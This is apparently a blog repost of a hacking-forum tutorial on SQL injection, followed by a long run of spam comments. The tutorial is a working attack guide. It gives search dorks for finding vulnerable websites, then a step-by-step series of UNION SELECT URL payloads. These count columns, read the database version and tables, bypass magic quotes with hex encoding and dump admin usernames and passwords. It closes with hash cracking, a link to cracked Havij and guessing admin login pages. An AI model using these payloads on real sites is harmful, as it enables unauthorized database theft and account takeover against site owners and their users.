What is SQL injection?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
That is the first paragraph of the wikipedia page for SQLi (SQL injection) found here:
http://en.wikipedia.org/wiki/SQL_injection
I would advise reading the entire page.
What you need to do:
Either you need to find vulnerable sites manually or you can use my tool for finding vuln sites here: http://www.the-exiled.net/viewtopic.php?...9c79d8ab3d
To find sites manually, simply use 1 of these search dorks (or pm me if you want more dorks)
Quote:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
Checking for vulnerability:
In order to check if a site is vulnerable to SQL injection, just put a ' in the end of the url like this:
Quote:
http://www.examplesite.com/index.php?id=5'
If the site shows you an error it is vulnerable to SQLi.
Lets say we found a vulnerable site. In order to successfully extract information from the database we need to do a few things, so it might be a good idea to open a text document so you can write stuff down.
First we need to find out how many columns there is in the database. To do so we will use this query:
Quote:
http://www.examplesite.com/index.php?id=5 order by 1--
And we will keep increasing the number until we get an error.
Quote:
http://www.examplesite.com/index.php?id=5 order by 5--
http://www.examplesite.com/index.php?id=5 order by 10--
Lets say there is 10 columns in the database.
Now we need to find out which columns that are vulnerable to SQL injection. To do so we will use this query:
Quote:
http://www.examplesite.com/index.php?id=-5 union select 1,2,3,4,5,6,7,8,9,10--
Btw notice that i put a single - in front of the id number (id=-5)
Since there is no page with the id -5 it simply put just clears the sites text for us. That makes it easier for us to find the data that we are looking for.
Okay lets say the numbers 3, 6 and 9 popped up on the site. These are the vulnerable tables. Now we wanna find the version of the database. To do so we will use this query (in either 1 of the vulnerable tables but i chose 3 for this example)
Quote:
http://www.examplesite.com/index.php?id=-5 union select 1,2,@@version,4,5,6,7,8,9,10--
And if that doesn't work then try this 1:
Quote:
http://www.examplesite.com/index.php?id=-5 union select 1,2,version(),4,5,6,7,8,9,10--
Now we want to get the name of the database for later usage, to do so we will use this query:
Quote:
http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(database()),4,5,6,7,8,9,10--
Write that name down so you wont forget it. Lets say the database name i just extracted was named exampledatabase
If the version is 4 or below, it is probably best that you just move on to another site since you are gonna have to brute force the tables for information (which isn't a very good idea for starters :lol: )
If the version is 5 or above then we will use this query to show all the tables:
Quote:
http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
Btw you dont have to group concatenate the output here. These queries would work as well
Quote:
http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
http://www.examplesite.com/index.php?id=-5 union select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
Now you have the table names! Now you need to look at those tables and see if you can spot some tables we know has good information in it, tables such as:
User(s)
Admin(s)
tbluser(s) / tbl_user(s)
tbladmin(s) / tbl_admin(s)
Ofc the admin might not have given the table such an obvious name so you might have to look around abit.
Once you have found the table you think has the information you want, we will use this query (In this example i use admin):
Quote:
http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name="admin"--
If the site shows you an error now dont panic! All that means is that Magic Quotes is turned on. To bypass this we need to convert the text "admin" into hex.
To do this:
Copy the name of the table you are trying to access.
visit the site http://www.swingnote.com/tools/texttohex.php
Paste the name into the website where it says "Say Hello To My Little Friend".
Click Convert
Copy the hex into your query like this.
Quote:
http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x61646d696e--
Notice the 0x before the hex string. This is to tell the server that the next part is a hex string.
You should now see all the columns inside the table.
Now, once again you will have to spot the columns we wanna see the contents of (although it is hopefully easier this time)
Lets say there are 2 columns called username and password. In order to see what are inside of those columns we will use this query:
Quote:
http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10 from exampledatabase.admin--
this is where we needed the database name. Btw the 0x3a means colon ( : )
Now you have the admin login!
If it is decrypted, try to run it through some online md5 'decrypters' or use my free cracked havij here - http://www.the-exiled.net/viewtopic.php?...9c79d8ab3d
And now we have to find the admin login.
to do so, once again you can use havij for that, or you can search for it manually. If you wanna search manually you can try pages like these:
Quote:
http://www.examplesite.com/admin.php
http://www.examplesite.com/admin.asp
http://www.examplesite.com/admin/
http://www.examplesite.com/adminlogin.php
http://www.examplesite.com/adminlogin.asp
http://www.examplesite.com/adminlogin/
http://www.examplesite.com/login.php
http://www.examplesite.com/login.asp
http://www.examplesite.com/login/
etc etc.
Subscribe to:
Post Comments
(
Atom
)
Hi,
ReplyDeletegreate article.Nice information thank you so much Flipkart Sbi Offer :10% Cashback Offer
Flipkart Cashback Offers
i really like this article please keep it up. SEO Company Vancouver
ReplyDeleteI wanted to thank you for this great read!! I definitely enjoying every little bit of it I have you bookmarked to check out new stuff you post. edu method cpa
ReplyDeleteIt's wonderful that you are getting thoughts from this post as well as from our discussion made at this time. Its a great pleasure reading your post.Its full of information I am looking for and I love to post a comment that "The content of your post is awesome" Great work.project free tv alternatives
ReplyDeleteThis is important, though it's necessary to help you head over to it weblink: Basaglar Vials
ReplyDeleteI have seen some great stuff here. Worth bookmarking for revisiting. I surprise how much effort you put to create such a great informative website. Your work is truly appreciated around the clock and the globe. medical spa industry growth
ReplyDeletenice post, keep up with this interesting work. It really is good to know that this topic is being covered also on this web site so cheers for taking time to discuss this! BizOp
ReplyDeleteI found so many interesting stuff in your blog especially its discussion. From the tons of comments on your articles, I guess I am not the only one having all the enjoyment here! keep up the good work... 온라인릴게임
ReplyDeleteNice post, i would like to read more. Wonderful article. why american buy insulin from canada
ReplyDeleteIt is crucial to recognize your rights as a beneficiary of the Social Security Disability Insurance software after you end up part of it - you would possibly locate that this software is greater useful than you at first idea it was!disability concerns
ReplyDeleteExcellent article. Very interesting to read. I really love to read such a nice article. Thanks! keep rocking. umrah packages
ReplyDeleteFabulous post, you have denoted out some fantastic points, I likewise think this s a very wonderful website. I will visit again for more quality contents and also, recommend this site to all. Thanks. 토토커뮤니티
ReplyDeleteRiddles, crosswords, math games, quizzes, memory or other visual games - knowledge games or more often known as brain games enjoy popularity among various players around the world on all kinds of platforms. From Brain Age on Nintendo DS, Brain Challenge for iPhone, Lumosity.com with its online platform or online games like Brain Buddies on Facebook - all these games train you brain abilities in a fun and engaging way. buy twitch followers
ReplyDeleteYour post is very interesting to me. Reading was so much fun. I think the reason reading is fun is because it is a post related to that I am interested in. Articles related to 온카지노 you are the best. I would like you to write a similar post about !
ReplyDeleteI am a 슬롯사이트 expert. I've read a lot of articles, but I'm the first person to understand as well as you. I leave a post for the first time. It's great!!
ReplyDeleteIt will be worth the time to learn this skill. Ozempic pen
ReplyDeletediscussion can happen at whatever point. In this way calling at specialized help for yahoo would be the best one can do. https://onohosting.com/
ReplyDeleteI just couldn't leave your website before telling you that I truly enjoyed the top quality info you present to your visitors? Will be back again frequently to check up on new posts. Cyber Attack
ReplyDeleteThis is important, though it's necessary to help you head over to it weblink: 사설토토
ReplyDeleteMyKFCExperience executed a connected with the WWW review to take an arrangement about MyKFCExperience Helpline notwithstanding your support level thereafter visiting service Click here MyKFCExperience After completing the survey, all entrants will receive a 15% discount code for free. To be able to participate, customers need to have a recent purchase receipt which contains the information that they will be asked to fill before the survey.
ReplyDeleteTalkToWendys executed a connected with the WWW review to take an arrangement about TalkToWendys Helpline notwithstanding your support level thereafter visiting service Click here TalkToWendys The TalktoWendys survey takes very little time for each participant and, in turn, offers a lot of survey rewards. In addition, your participation in the TalktoWendys survey ensures an improvement in customer satisfaction on your future visit to the Wendys.
ReplyDelete